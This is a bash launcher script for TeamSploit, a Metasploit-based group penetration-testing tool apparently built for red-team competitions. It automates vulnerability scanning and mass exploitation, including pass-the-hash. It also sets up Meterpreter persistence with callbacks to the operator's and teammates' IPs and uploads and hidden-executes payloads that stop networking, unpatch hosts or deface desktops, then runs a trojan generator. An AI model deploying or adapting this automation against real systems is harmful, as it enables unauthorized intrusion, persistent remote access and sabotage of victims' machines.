#!/bin/bash

#       TeamSploit - Pen Testing With Friends
#       Copyrighted:  Justin M. Wray (wray.justin@gmail.com)
#       Special Thanks:  Team ICF (Twitter:@ICFRedTeam)
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.

#  Oh did you manually pass stuff in?  Idiot...

source teamsploit.conf

echo "set Prompt ts-listener" > .teamsploit.rc.listener
echo "set ExitOnSession false" >> .teamsploit.rc.listener
echo "use exploit/multi/handler" >> .teamsploit.rc.listener
echo "setg LHOST $TS_MY_IP" >> .teamsploit.rc.listener
echo "set LPORT $TS_TEAM_PORT" >> .teamsploit.rc.listener
echo "exploit -z -j" >> .teamsploit.rc.listener
echo "set ExitOnSession false" >> .teamsploit.rc.listener
echo "set LPORT $TS_TEAM_PORT_2" >> .teamsploit.rc.listener
echo "exploit -z -j" >> .teamsploit.rc.listener
echo "set ExitOnSession false" >> .teamsploit.rc.listener
echo "set LPORT $TS_TEAM_PORT_HTTP" >> .teamsploit.rc.listener
echo "exploit -z -j" >> .teamsploit.rc.listener
echo "set ExitOnSession false" >> .teamsploit.rc.listener
echo "set LPORT $TS_TEAM_PORT_HTTPS" >> .teamsploit.rc.listener
echo "exploit -z -j" >> .teamsploit.rc.listener
echo "clear" >> .teamsploit.rc.listener
echo "jobs -v" >> .teamsploit.rc.listener

echo "set Prompt teamsploit" > .teamsploit.rc.primary

if [ $TS_SPLOITWATCH == 1 ]; then
	echo "load sploitwatch" >> .teamsploit.rc.primary
	echo "set SPLOITWATCH_CMD_REPORT $TS_SPLOITWATCH_CMD_REPORT" >> .teamsploit.rc.primary
	echo "set SPLOITWATCH_SRV_URI $TS_SPLOITWATCH_SRV_URI" >> .teamsploit.rc.primary
	echo "set SPLOITWATCH_EVENT $TS_SPLOITWATCH_EVENT" >> .teamsploit.rc.primary
	echo "set SPLOITWATCH_HANDLE $TS_SPLOITWATCH_HANDLE" >> .teamsploit.rc.primary
fi

echo "load autopost" >> .teamsploit.rc.primary
echo "load openvas" >> .teamsploit.rc.primary
echo "load nexpose" >> .teamsploit.rc.primary
echo "load nessus" >> .teamsploit.rc.primary
echo "load nessus_teamsploit" >> .teamsploit.rc.primary
echo "load auto_exploit" >> .teamsploit.rc.primary
echo "load pass_the_hash" >> .teamsploit.rc.primary
echo "set AutoLoadStdapi false" >> .teamsploit.rc.primary

#  Connect to our Vuln Scanner(s)
if [ $TS_NESSUS_CONNECT == 1 ]; then
	echo "nessus_connect $TS_NESSUS_USER:$TS_NESSUS_PASS@$TS_NESSUS_HOST:$TS_NESSUS_PORT ok" >> .teamsploit.rc.primary
	echo "nessus_teamsploit_connect $TS_NESSUS_USER:$TS_NESSUS_PASS@$TS_NESSUS_HOST:$TS_NESSUS_PORT ok" >> .teamsploit.rc.primary
fi
if [ $TS_NEXPOSE_CONNECT == 1 ]; then
	echo "nexpose_connect $TS_NEXPOSE_USER:$TS_NEXPOSE_PASS@$TS_NEXPOSE_HOST:$TS_NEXPOSE_PORT ok" >> .teamsploit.rc.primary
fi
if [ $TS_OPENVAS_CONNECT == 1 ]; then
	echo "openvas_connect $TS_OPENVAS_USER:$TS_OPENVAS_PASS@$TS_OPENVAS_HOST:$TS_OPENVAS_PORT ok" >> .teamsploit.rc.primary
fi

#  We can haz shared DB?
if [ $TS_LOCAL == 0 ]; then
	echo "db_connect $TS_DB_USER:$TS_DB_PASS@$TS_DB_HOST:$TS_DB_PORT/$TS_DB_NAME" >> .teamsploit.rc.primary
fi

#  Duplicate our Primary RC for Sub Primary Shells
echo "clear" >> .teamsploit.rc.primary
echo "show plugins" >> .teamsploit.rc.primary
cp .teamsploit.rc.primary .teamsploit.rc.primary.sub

#  Run Scans?
SCAN_RANGE=`echo $TS_TARGET_RANGES | sed -e 's/;/\n/g' | sed -e 's/$/.0\/24/g' | tr '\n' ',' | sed -e 's/\,$//g'`
if [ $TS_NESSUS_AUTOSCAN == 1 ]; then
	echo "nessus_scan_new $TS_NESSUS_POLICY \"teamsploit - `date +%D-%T`\" $SCAN_RANGE" >> .teamsploit.rc.primary
fi
if [ $TS_NEXPOSE_AUTOSCAN == 1 ]; then
	echo "nexpose_scan $SCAN_RANGE" >> .teamsploit.rc.primary
fi
if [ $TS_OPENVAS_AUTOSCAN == 1 ]; then
	echo "openvas_target_create \"teamsploit\" $SCAN_RANGE \"targets\"" >> .teamsploit.rc.primary
	echo "openvas_task_create \"teamsploit Scan\" \"Scan teamsploit Targets\" 0 1" >> .teamsploit.rc.primary
	echo "openvas_task_start 0" >> .teamsploit.rc.primary
fi

#  Are we running a MSFD/MSFRPCD Service?
if [ $TS_SERVER == 1 ]; then
	echo "load msfd ServerHost=$TS_MY_IP ServerPort=$TS_SERVER_MSFD_PORT" >> .teamsploit.rc.primary
	echo "load msgrpc Host=$TS_MY_IP Port=$TS_SERVER_MSFRPCD_PORT User=$TS_SERVER_MSFRPCD_USER Pass=$TS_SERVER_MSFRPCD_PASS" >> .teamsploit.rc.primary
fi

echo "clear" >> .teamsploit.rc.primary
echo "show plugins" >> .teamsploit.rc.primary

WORKSPACE_NAME=`date +teamsploit_%s`
if [ $TS_AUTO_OWN == 1 ];then
	echo "workspace -a $WORKSPACE_NAME" >> .teamsploit.rc.primary
	echo "workspace $WORKSPACE_NAME" >> .teamsploit.rc.primary
	echo "nessus_teamsploit_scan_wait" >> .teamsploit.rc.primary
	echo "nessus_teamsploit_report_get last" >> .teamsploit.rc.primary
	echo "vuln_exploit -j $TS_AUTO_OWN_JOBS" >> .teamsploit.rc.primary
	echo "pass_the_hash -j $TS_AUTO_OWN_JOBS" >> .teamsploit.rc.primary
	echo "clear" >> .teamsploit.rc.primary
	echo "sessions -l" >> .teamsploit.rc.primary
fi

rm /tmp/autopost.rb.* 2> /dev/null

#  Lets setup the plugins!
echo "session.run_cmd('run persistence -S -U -X -i 30 -p $TS_TEAM_PORT -r $TS_MY_IP')" > .msf/plugins/.autopost.source.persistence
if [[ $TS_SHARE_SHELLS == 1 ]] && [[ $TS_TEAM_MATES != "" ]]; then
	echo $TS_TEAM_MATES | sed -e 's/;/\n/g' | sed -e 's/^/session.run_cmd(\"run persistence -S -U -X -i 30 -p '$TS_TEAM_PORT' -r /g' -e 's/$/\")/g' | tr '"' "'" >> .msf/plugins/.autopost.source.persistence
fi

echo > .msf/plugins/.autopost.source.trojans
if [ $TS_NETSTOPPER == 1 ]; then
	echo "session.run_cmd('upload ./.trojans/netstopper.cmd .')" >> .msf/plugins/.autopost.source.trojans
	echo "session.run_cmd('execute -H -f netstopper.cmd')" >> .msf/plugins/.autopost.source.trojans
fi
if [ $TS_UNPATCHER == 1 ]; then
	echo "session.run_cmd('upload ./.trojans/unpatch.cmd .')" >> .msf/plugins/.autopost.source.trojans
	echo "session.run_cmd('execute -H -f unpatch.cmd')" >> .msf/plugins/.autopost.source.trojans
fi
if [ $TS_TROLLWARE == 1 ]; then
	echo "session.run_cmd('upload ./.trojans/wintroll.cmd .')" >> .msf/plugins/.autopost.source.trojans
	echo "session.run_cmd('upload ./.trojans/wallpaper.bmp .')" >> .msf/plugins/.autopost.source.trojans
	echo "session.run_cmd('execute -H -f wintroll.cmd')" >> .msf/plugins/.autopost.source.trojans
fi

TS_LOOT_DIR_DEL=`echo $TS_LOOT_DIR | sed -e 's/\//||/g'`
if [ $TS_TARGET_SOLO == 0 ]; then
	sed '/#!TS_AUTOPOST_AUTOTARGET!#/ r .msf/plugins/.autopost.source.autotarget' .msf/plugins/.autopost.source.general > /tmp/autopost.rb.autotarget
	sed '/#!TS_AUTOPOST_GENERAL!#/ r /tmp/autopost.rb.autotarget' .msf/plugins/.autopost.source > /tmp/autopost.rb.general
else
	sed '/#!TS_AUTOPOST_GENERAL!#/ r .msf/plugins/.autopost.source.general' .msf/plugins/.autopost.source > /tmp/autopost.rb.general
fi
sed '/#!TS_AUTOPOST_WINDOWS!#/ r .msf/plugins/.autopost.source.windows' /tmp/autopost.rb.general > /tmp/autopost.rb.windows
sed '/#!TS_AUTOPOST_LINUX!#/ r .msf/plugins/.autopost.source.linux' /tmp/autopost.rb.windows > /tmp/autopost.rb.linux
sed '/#!TS_AUTOPOST_OSX!#/ r .msf/plugins/.autopost.source.osx' /tmp/autopost.rb.linux > /tmp/autopost.rb.oxs
sed '/#!TS_AUTOPOST_PERSISTENCE!#/ r .msf/plugins/.autopost.source.persistence' /tmp/autopost.rb.oxs > /tmp/autopost.rb.persistence
sed '/#!TS_AUTOPOST_TROJANS!#/ r .msf/plugins/.autopost.source.trojans' /tmp/autopost.rb.persistence > /tmp/autopost.rb.trojans
sed -e 's/#!TS_AUTOPOST_GENERAL!#//g' -e 's/#!TS_AUTOPOST_WINDOWS!#//g' -e 's/#!TS_AUTOPOST_LINUX!#//g' -e 's/#!TS_AUTOPOST_OSX!#//g' -e 's/#!TS_AUTOPOST_PERSISTENCE!#//g' -e 's/#!TS_AUTOPOST_TROJANS!#//g' -e 's/#!TS_AUTOPOST_AUTOTARGET!#//g' /tmp/autopost.rb.trojans > /tmp/autopost.rb.full
sed -e 's/#!TS_LOOT_DIR!#/'$TS_LOOT_DIR_DEL'/g' -e 's/||/\//g' /tmp/autopost.rb.full > /tmp/autopost.rb.final
sed -e 's/#!TS_AUTOPOST_OUTPUT!#/'$TS_AUTOPOST_OUTPUT'/g' -e 's/#!TS_TEAM_MATES!#/'$TS_TEAM_MATES'/g' -e 's/#!TS_TEAM_PORT!#/'$TS_TEAM_PORT'/g' -e 's/#!TS_ADMIN_USER!#/'$TS_ADMIN_USER'/g' -e 's/#!TS_ADMIN_PASS!#/'$TS_ADMIN_PASS'/g' /tmp/autopost.rb.final > ./.msf/plugins/autopost.rb
cat .msf/plugins/autopost.rb | grep -vf .msf/plugins/.autopost.source.autotarget > .msf/plugins/autopost_notrg.rb
sudo cp -R ./.msf/plugins/*.rb $TS_MSF_PATH/msf3/plugins/
sudo cp -R ./.msf/scripts/meterpreter/*.rb $TS_MSF_PATH/msf3/scripts/meterpreter/

if [ $TS_SERVER == 1 ]; then
	sudo msfd -a $TS_MY_IP -p $TS_SERVER_MSFD_PORT
	sudo msfrpcd -a $TS_MY_IP -p $TS_SERVER_MSFRPCD_PORT -U $TS_SERVER_MSFRPCD_USER -P $TS_SERVER_MSFRPCD_PASS
	sleep 10
	cat .teamsploit.rc.primary.sub | sed '$aexit' | nc $TS_MY_IP $TS_SERVER_MSFD_PORT
fi

if [ $TS_TROJAN == 1 ]; then
	./.gentrojan
fi
